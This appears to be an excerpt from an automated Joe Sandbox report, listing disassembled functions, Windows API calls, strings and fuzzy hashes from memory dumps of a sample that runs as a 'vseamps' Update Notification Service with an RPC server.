                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                    • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                                    • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                    • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeLibraryProc
                                                    • String ID: api-ms-$ext-ms-
                                                    • API String ID: 3013587201-537541572
                                                    • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                    • Instruction ID: 5ea9aa363f259b8d53dce1bbf32b1bf042081980da72f0676d3291b13aef2227
                                                    • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                    • Instruction Fuzzy Hash: 8B414925B19A0342EA1ACBAE98516BA23A1BF15BD4F086535DF0EDB7D4EF3CE405C300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                                    • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                    • API String ID: 1119674940-1966266597
                                                    • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                    • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                                    • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                    • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocProcesslstrlen$ComputerName
                                                    • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                    • API String ID: 3702919091-996641649
                                                    • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                    • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                                    • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                    • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                                    APIs
                                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$Info
                                                    • String ID:
                                                    • API String ID: 1775632426-0
                                                    • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                    • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                                    • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                    • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BFAF72EB,?,?,?,00007FF8BFAF3EC0,?,?,?,?,00007FF8BFAF3CFD), ref: 00007FF8BFAF71B1
                                                    • GetLastError.KERNEL32(?,?,?,00007FF8BFAF72EB,?,?,?,00007FF8BFAF3EC0,?,?,?,?,00007FF8BFAF3CFD), ref: 00007FF8BFAF71BF
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BFAF72EB,?,?,?,00007FF8BFAF3EC0,?,?,?,?,00007FF8BFAF3CFD), ref: 00007FF8BFAF71E9
                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF8BFAF72EB,?,?,?,00007FF8BFAF3EC0,?,?,?,?,00007FF8BFAF3CFD), ref: 00007FF8BFAF7257
                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF8BFAF72EB,?,?,?,00007FF8BFAF3EC0,?,?,?,?,00007FF8BFAF3CFD), ref: 00007FF8BFAF7263
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                    • String ID: api-ms-
                                                    • API String ID: 2559590344-2084034818
                                                    • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                    • Instruction ID: 2da276819095a328d865248737b7d0ed8c2065f7405329805f9dafc8f698eb31
                                                    • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                    • Instruction Fuzzy Hash: 3031F421A1A74192FE1A9B9AA8015BD2394BF48BE4F195534EF1D8F750EE3CF444C300
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    • API String ID: 2506987500-0
                                                    • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                    • Instruction ID: 7dfc36721ada384d968050a5d41cd8e4b01fa1fc7d70f0581c1fd473b393a15f
                                                    • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                    • Instruction Fuzzy Hash: 17214F20A0C24347FA5D67BD59A213963515F5C7F8F546634DB3E8FAD6DE2CA4418600
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                    • String ID: CONOUT$
                                                    • API String ID: 3230265001-3130406586
                                                    • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                    • Instruction ID: f244e3c6f1cce200747032777000132e197512f6631ea7c2adc5e7b1a591c43f
                                                    • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                    • Instruction Fuzzy Hash: F0115E21A18B4186E7518BAAE85432973A0FF88BE4F044234EB5DA7BB4DF7CD5488744
                                                    APIs
                                                    • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                                    • CreateEventW.KERNEL32 ref: 00000001400012C0
                                                      • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                                      • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                                      • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                                      • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                                      • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                                      • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                                      • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                                      • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                                      • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                                      • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                                      • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                                    • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                                    • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                                      • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                                      • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                                      • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                                      • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                                      • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                                      • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                                      • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                                      • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                                      • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                                      • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                                      • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                                      • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                                      • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                                      • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                                      • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                                      • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                                      • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                                    • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                                    • String ID: vseamps
                                                    • API String ID: 3197017603-3944098904
                                                    • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                    • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                                    • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                    • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Messagesprintf_s
                                                    • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                                    • API String ID: 2642950106-3610746849
                                                    • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                    • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                                    • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                    • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                    • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                                    • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                    • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                    • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                                    • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                    • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                                    APIs
                                                    • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                                    • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                                    • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: StringType$ByteCharMultiWide$ErrorLast
                                                    • String ID:
                                                    • API String ID: 319667368-0
                                                    • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                    • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                                    • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                    • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                                    APIs
                                                    • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                                    • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                                      • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                                    • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                                    • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                                    • String ID:
                                                    • API String ID: 1390108997-0
                                                    • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                    • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                                    • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                    • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 3523768491-393685449
                                                    • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                    • Instruction ID: e555224e6e1cad29ebb3e1a35cb27cd1dbc630c965eb7bca3887eb592e270fc3
                                                    • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                    • Instruction Fuzzy Hash: D3E19132A087828BE724AFA8D4822ED77A4FB4578CF146135DF8D9B656DF38E481C740
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00007FF8BFAF8BC9,?,?,?,?,00007FF8BFAF8C14), ref: 00007FF8BFAF95CB
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF8BFAF8BC9,?,?,?,?,00007FF8BFAF8C14), ref: 00007FF8BFAF9601
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF8BFAF8BC9,?,?,?,?,00007FF8BFAF8C14), ref: 00007FF8BFAF962E
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF8BFAF8BC9,?,?,?,?,00007FF8BFAF8C14), ref: 00007FF8BFAF963F
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF8BFAF8BC9,?,?,?,?,00007FF8BFAF8C14), ref: 00007FF8BFAF9650
                                                    • SetLastError.KERNEL32(?,?,?,00007FF8BFAF8BC9,?,?,?,?,00007FF8BFAF8C14), ref: 00007FF8BFAF966B
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
